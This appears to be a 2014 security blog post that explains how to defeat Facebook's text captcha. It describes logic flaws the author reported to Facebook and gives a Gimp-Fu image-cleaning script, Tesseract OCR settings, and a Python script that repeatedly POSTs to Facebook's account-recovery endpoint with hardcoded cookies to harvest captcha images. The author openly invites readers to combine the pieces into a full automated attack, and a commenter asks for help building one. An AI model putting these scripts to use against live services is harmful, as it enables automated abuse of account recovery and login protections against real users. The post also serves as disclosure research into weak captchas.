Thursday 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.


The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).


The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:


Let's look at some ways to bypass the text captcha :)


A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...


Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.
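To put the repetition issue in perspective, here is a minimal sketch of the keyspace arithmetic and of how an attacker could reuse answers once images start repeating. The `SolvedCaptchaCache` class and its method names are hypothetical, and the sketch assumes a repeated captcha is served as a byte-identical image, which the post does not confirm.

```python
import hashlib

# 26 lowercase + 26 uppercase + 10 digits, 7 characters per captcha
KEYSPACE = 62 ** 7


class SolvedCaptchaCache:
    """Hypothetical lookup table of already-solved captcha images."""

    def __init__(self):
        self._answers = {}

    @staticmethod
    def fingerprint(image_bytes):
        # Assumption: a repeated captcha is the exact same file, so a hash
        # of the raw bytes is enough to recognise it.
        return hashlib.sha256(image_bytes).hexdigest()

    def remember(self, image_bytes, answer):
        self._answers[self.fingerprint(image_bytes)] = answer

    def lookup(self, image_bytes):
        # Returns None when the image has not been seen before.
        return self._answers.get(self.fingerprint(image_bytes))


cache = SolvedCaptchaCache()
cache.remember(b"fake image bytes", "aB3dE9k")
print(KEYSPACE)                          # 3521614606208
print(cache.lookup(b"fake image bytes"))  # aB3dE9k
print(cache.lookup(b"never seen"))        # None
```

If the same text were re-rendered with different noise each time, a byte hash would not match and a perceptual comparison would be needed instead.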

The logic flaws were interesting but let's not forget OCR as well!


Back to the image...

Let's take a look at a Facebook captcha image:


When thinking about OCR analysis there are some things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad
I did some testing with Tesseract and found noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above will return invalid characters or no response at all. To improve Tesseract results I needed some way to get rid of the noise and repair damaged characters.


Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation and debugging support aren't great, it gets the job done.

First I loaded the image and doubled its size. I found that processing a smaller image was less accurate and reduced the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)

Next I removed the background noise. Selecting by color (black) and then shrinking the selection deselected the thin black lines, leaving just the thicker black letters. To actually paint over the noise I re-grew the selection, filled it black to firm up the letters, then inverted the selection and painted white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)
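
The shrink-then-grow trick is close in spirit to what image processing calls a morphological opening. The pure-Python sketch below illustrates the idea on a tiny black and white grid. It is not what Gimp runs internally, the helper names are made up for this example, and it grows by the same amount it shrinks, whereas the script above shrinks by 1 and grows by 2.

```python
def to_grid(rows):
    """Turn strings of '#' (black) and '.' (white) into a 0/1 grid."""
    return [[1 if ch == "#" else 0 for ch in row] for row in rows]


def to_rows(grid):
    """Inverse of to_grid, handy for printing."""
    return ["".join("#" if v else "." for v in row) for row in grid]


def erode(grid):
    """Shrink: keep a pixel only if it and all 8 neighbours are black."""
    h, w = len(grid), len(grid[0])

    def black(y, x):
        return 0 <= y < h and 0 <= x < w and grid[y][x] == 1

    return [[1 if all(black(y + dy, x + dx)
                      for dy in (-1, 0, 1) for dx in (-1, 0, 1)) else 0
             for x in range(w)] for y in range(h)]


def dilate(grid):
    """Grow: set a pixel if it or any of its 8 neighbours is black."""
    h, w = len(grid), len(grid[0])

    def black(y, x):
        return 0 <= y < h and 0 <= x < w and grid[y][x] == 1

    return [[1 if any(black(y + dy, x + dx)
                      for dy in (-1, 0, 1) for dx in (-1, 0, 1)) else 0
             for x in range(w)] for y in range(h)]


def opening(grid):
    """Shrink then grow: thin lines vanish, thick shapes come back."""
    return dilate(erode(grid))


# A 3x3 "character" plus a 1-pixel-thick scribble underneath it.
patch = [
    ".........",
    ".###.....",
    ".###.....",
    ".###.....",
    ".........",
    "#########",
    ".........",
]
for row in to_rows(opening(to_grid(patch))):
    print(row)
```

The scribble disappears because none of its pixels is fully surrounded by black, while the block survives the shrink as a single pixel and is restored by the grow.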

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection down 4 pixels and paint (positive y points down in Gimp)
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection up 10 pixels (6 above the starting position) and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)
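
The translate-and-paint step can be pictured as copying the black pixels a few rows up or down and merging the copy back in. Below is a rough pure-Python sketch of that idea on a toy grid. The function names are hypothetical, and the offsets are applied independently from the starting position, whereas the Gimp calls above are cumulative.

```python
def shift_rows(grid, dy):
    """Copy of grid moved dy rows (positive = down); vacated rows are white."""
    h, w = len(grid), len(grid[0])
    out = [[0] * w for _ in range(h)]
    for y in range(h):
        src = y - dy
        if 0 <= src < h:
            out[y] = list(grid[src])
    return out


def paint_shifted(grid, offsets):
    """Merge (OR) vertically shifted copies of the black pixels into the grid."""
    result = [list(row) for row in grid]
    for dy in offsets:
        moved = shift_rows(grid, dy)
        for y, row in enumerate(moved):
            for x, value in enumerate(row):
                if value:
                    result[y][x] = 1
    return result


# A vertical stroke with a one-row white streak cut through it (row 2).
stroke = [
    [0, 0, 0, 0],
    [0, 1, 1, 0],
    [0, 0, 0, 0],
    [0, 1, 1, 0],
    [0, 0, 0, 0],
]
for row in paint_shifted(stroke, [1]):
    print("".join("#" if v else "." for v in row))
```

The streak is filled, but the stroke also grows by one row at the bottom, so this kind of repair trades some character shape for continuity.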

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"
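
To clean a whole folder of captchas, the same command can be driven from Python. This is only a sketch: `build_gimp_command` and `clean_all` are names invented here, and the executable name is taken from the command above and assumed to be on the PATH.

```python
import subprocess


def build_gimp_command(image_path, exe="gimp-console-2.8.exe"):
    """Build the argument list for one non-interactive python-clean run."""
    # The path ends up inside a Script-Fu string literal, so backslashes
    # and double quotes are escaped first.
    escaped = image_path.replace("\\", "\\\\").replace('"', '\\"')
    batch = '(python-clean RUN-NONINTERACTIVE "%s")' % escaped
    return [exe, "-i", "-b", batch, "-b", "(gimp-quit 0)"]


def clean_all(image_paths):
    """Run the cleaning script on each image in turn (starts Gimp per file)."""
    for path in image_paths:
        subprocess.run(build_gimp_command(path), check=True)


print(build_gimp_command("test.png"))
```

Starting Gimp once per image is slow. For a large batch it would probably be better to loop over the files inside the Gimp script itself.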

As an example, cleaning the image above I got this:



Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb

I created the fb character set as a config file in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs". It contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
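
For scripting, the Tesseract call can be wrapped in a small helper. The sketch below assumes `tesseract.exe` is on the PATH and that the fb config described above exists. The function names are hypothetical, and newer Tesseract releases spell the flag `--psm` rather than `-psm`.

```python
import subprocess
from pathlib import Path

WHITELIST = ("abcdefghijklmnopqrstuvwxyz"
             "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
             "1234567890")


def build_tesseract_command(image_path, output_base, exe="tesseract.exe"):
    """Same arguments as the command above: single word mode plus fb config."""
    return [exe, str(image_path), str(output_base),
            "-psm", "8", "nobatch", "fb"]


def tidy_ocr_text(raw):
    """Drop whitespace and anything else outside the whitelist."""
    return "".join(ch for ch in raw if ch in WHITELIST)


def ocr_captcha(image_path, output_base="output"):
    """Run Tesseract and read back the <output_base>.txt file it writes."""
    subprocess.run(build_tesseract_command(image_path, output_base), check=True)
    return tidy_ocr_text(Path(str(output_base) + ".txt").read_text())


print(build_tesseract_command("test.jpg", "output"))
print(tidy_ocr_text("aB3 dE9k\n"))  # aB3dE9k
```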


Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack. I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking, don't actually do this!)

Theoretically though, if you did want to build a fully functioning script you'd just need to take the Python script from my Bugcrowd post and the cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
import re
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.request import Request, urlopen, urlretrieve

def getpage():
    #POST to the recovery page and return (challenge codes, challenge hashes)
    try:
        print("[+] POSTing to fb")
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        with urlopen(request, data) as f:
            response = f.read().decode('utf-8')
        ccode = re.findall('[a-z0-9-]{43}', response)
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response")
        return ccode, chash
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")
        return [], []

def getcaptcha(i, ccode, chash):
    #Skip this round if the page did not contain the expected tokens
    if not ccode or len(chash) < 2:
        print("*****Error: Captcha tokens not found*****")
        return
    try:
        print("[+] Downloading Captcha")
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")

print("[+] Start!")
for i in range(0, 1000):
    #Download page and parse data
    ccode, chash = getpage()
    #Download captcha image
    getcaptcha(i, ccode, chash)
print("[+] Finished!")



Final Results

So I guess you're wondering, how accurate was Tesseract? On a sample of 50 captchas that had been cleaned with Gimp, Tesseract read every character correctly about 20% of the time. Taking the logic flaws into account, however, the actual pass rate jumped to 50%.
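
To see why the logic flaws lift the pass rate, here is a small scoring sketch that compares a strict check with a lenient one (case insensitive, one wrong character tolerated). How Facebook's server actually compared answers is not known, so `lenient_match` is only a guess that treats the tolerated error as a single substituted character. The sample pairs are made up for illustration and are not the test data from this post.

```python
def strict_match(expected, guess):
    """Every character must match, including case."""
    return expected == guess


def lenient_match(expected, guess, max_wrong=1):
    """Assumed server behaviour: ignore case, allow one wrong character."""
    if len(expected) != len(guess):
        return False
    wrong = sum(1 for a, b in zip(expected.lower(), guess.lower()) if a != b)
    return wrong <= max_wrong


def pass_rate(pairs, matcher):
    """Fraction of (expected, ocr_guess) pairs the matcher accepts."""
    return sum(1 for expected, guess in pairs if matcher(expected, guess)) / len(pairs)


# Illustrative (expected, OCR output) pairs
samples = [
    ("aB3dE9k", "aB3dE9k"),  # perfect read
    ("aB3dE9k", "ab3de9k"),  # case errors only
    ("aB3dE9k", "aB3dE9x"),  # one wrong character
    ("aB3dE9k", "zz3dE9k"),  # two wrong characters
]
print(pass_rate(samples, strict_match))   # 0.25
print(pass_rate(samples, lenient_match))  # 0.75
```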

Some example results:


It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed, although you can also see how even subtle changes in the initial image can significantly affect both the cleaning output and the final analysis.


Facebook Fix #1

After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:


Unfortunately this had little effect on the captcha strength, as it's the thickness of the noise relative to the characters that matters, not the absolute thickness. Making the noise thicker and the characters thinner would have prevented noise removal through selection shrinking.


Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass rate with OCR alone, and I'm sure that with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out


############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection down 4 pixels and paint (positive y points down in Gimp)
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection up 10 pixels (6 above the starting position) and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)

main()

############################################

28 comments:

  1. this is a great deduction.

  2. Hi,

    Your gimp script is no more remove all the disturbance from the image. I am creating facebook captha reader. Would you help me in this?

  4. Unfortunately I'm busy with other work right now. Don't give up though, filtering should be able to help with a lot of different captcha variations :)
